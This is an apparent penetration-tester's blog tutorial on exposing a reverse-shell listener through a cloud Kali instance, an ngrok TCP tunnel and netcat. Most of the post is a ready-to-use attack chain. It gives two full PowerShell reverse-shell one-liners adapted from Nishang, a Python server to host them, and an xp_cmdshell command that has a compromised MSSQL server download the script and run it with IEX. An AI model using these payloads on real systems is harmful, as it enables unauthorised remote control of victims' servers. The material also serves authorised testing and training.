Fishing for a reverse shell

Written By Syed Huda

Recently I had a scenario where I had to catch a reverse shell in a public facing environment. This meant that a public facing instance was needed where the listener could be setup to catch this shell.

The approach was similar to setting it up on a local environment, apart from a few things that we needed to do to expose a public instance so it could be used as a listener to catch this shell.

0 - Choosing a provider

I found Vultr to be the cheapest and easiest option for me (this is not sponsored). Although you can choose another provider of your choice.

For Vultr, I was able to select the cheapest instance and use the Kali ISO as a custom install. I deleted the instance once I was done with it, as they charge you for powered-down images as well because they still take up resources.

Source —> https://www.vultr.com/

1 - Setting up Ngrok

“ngrok is a secure unified ingress platform that combines your reverse proxy, firewall, API gateway and global load balancing into a production service.”

It is quite simple to get started with this service. Just go to https://dashboard.ngrok.com/signup and establish an account. Once that is done we can proceed to installing this via a snap package:

snap install ngrok

The above might give an error in some instances if the service is not enabled. So to rectify this, we run the following commands and enable the service:

$ systemctl enable snapd.service
$ systemctl start snapd.service

After the the snap service has successfully started/restarted; we can proceed to installing ngrok via snap package install as follows:

$ sudo snap install ngork

Once ngrok is installed, we can now navigate to the setup and grab our auth token from the ngrok web UI; for linux (in our case) we can navigate here -> https://dashboard.ngrok.com/get-started/setup/linux and copy the command that already includes the auth token as follows:

Before running the above ngrok config command; we need to ensure that the PATH variable on our terminal is setup for us to call ngrok directly; the export PATH command is used to set the PATH environment variable for the current session. We do this as follows:

$ export PATH=$PATH:/snap/bin

After the PATH is setup, we now run the ngrok config command with our token to get the ngrok up and running:

ngrok config add-authtoken <TOKEN>

After the configuration has been added with the auth token, we are all set to run ngrok on port of our choice. I chose tcp 1234 in my case (but this could be any port of your choice depending on scenario you are in):

$ ngrok tcp 1234

This pops up a ngrok dashboard, where the address of our listener is provided via an ngrok hostname and port. This will be used as the listening (LHOST) host for all instances; as this is now the host address that is exposed to catch our shell over the internet.

2 - Setting up Netcat Listener

As our reverse shell listener, we can use netcat to listen on port 1234 as we have set that as our listening (LPORT) as follows:

$ nc -lvnp 1234

3 - Exploiting a MSSQL Service

I already had partial access to a MSSQL service, although needed interactive shell access. So I decided to host use Nishang’s Invoke-PowerShellTcpOneLine.ps1 to create my rev-shell after deleting comments and unwanted bloat, I was able to use the following and save it as script1.ps1 for hosting on my cloud instance:

$client = New-Object System.Net.Sockets.TCPClient('NGROK ADDRESS',NGROK PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$sm=(New-Object Net.Sockets.TCPClient('NGROK ADDRESS',NGROK PORT)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

From the above you can replace NGROK ADDRESS',NGROK PORT with your ngrok address and port (These will be the Ngrok address and the port of the proxy (NOT the LPORT we chose as 1234], derived from the dashboard when you launched ngrok tcp command.

Now we can host the above as script.ps1 (or another name of your choice) on our publicly exposed cloud instance. To do this we can use python simple http service as follows on the Kali instance (on the directoty where you placed script.ps1.

$ python -m http.server 9090

Since I already had some access to the MSSQL service via xp_cmdshell, I was able to use a powershell command on it to execute our Nishang reverseshell by downloading it from our hosted instance and launching it as follows:

powershell echo IEX (New-Object Net.WebClient).DownloadString("http://CLOUD-INSTANCE-IP:9090/script.ps1") | powershell -noprofile'

Fin.

Syed Huda
Previous

Intercepting Non-Proxy Aware Mobile Applications
Next

Commonly asked Application Security interview questions - Part 2